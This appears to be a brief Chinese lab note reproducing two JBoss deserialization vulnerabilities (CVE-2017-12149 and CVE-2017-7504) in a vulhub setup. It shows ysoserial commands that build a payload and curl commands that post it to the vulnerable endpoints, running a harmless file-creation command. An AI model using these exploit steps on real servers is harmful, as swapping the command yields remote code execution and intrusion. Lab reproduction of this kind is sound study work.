vulhub复现
JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)
执行命令
java -jar ysoserial-all.jar CommonsCollections5 "touch /tmp/success" > poc1.ser
curl -X post http://192.168.66.102:8080/invoker/readonly --data-binary @poc1.ser
容器内文件创建成功
JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)
执行命令
java -jar ysoserial-all.jar CommonsCollections5 "touch /tmp/success" > poc1.ser
curl http://192.168.66.102:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @poc1.ser
容器内文件创建成功